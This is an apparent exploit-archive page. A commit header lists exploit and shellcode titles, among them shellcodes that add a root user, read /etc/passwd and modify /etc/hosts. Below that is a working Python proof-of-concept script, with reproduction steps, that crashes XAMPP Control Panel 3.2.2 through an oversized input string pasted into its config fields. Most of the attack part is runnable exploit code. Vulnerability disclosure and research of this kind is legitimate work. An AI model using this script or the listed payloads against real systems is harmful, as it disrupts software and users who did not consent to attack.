
7 changes to exploits/shellcodes XAMPP Control Panel 3.2.2 - Denial of Service (PoC) Notebook Pro 2.0 - Denial Of Service (PoC) Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC) CA Release Automation NiMi 6.5 - Remote Command Execution Gitweb 1.7.3.3 - Cross-Site Scripting gitWeb 1.7.3.3 - Cross-Site Scripting Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
29 lines
No EOL
1 KiB
Python
Executable file
29 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
|
|
# Exploit Author: Gionathan "John" Reale
|
|
# Date: 2018-09-14
|
|
# Software: XAMPP
|
|
# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
|
|
# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
|
|
# Tested on: Windows 7 32bit
|
|
|
|
# Steps to Reproduce:
|
|
# Run the python exploit script, it will create a new file with the name "exploit.txt".
|
|
# Copy the contents of "exploit.txt"
|
|
# Start the program and click "Config(Top Right With Symbol)"
|
|
# Paste the contents of "exploit.txt" into the following fields:"Editor" & "Browser".
|
|
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
|
|
# You will see a crash!
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 6000
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("exploit.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |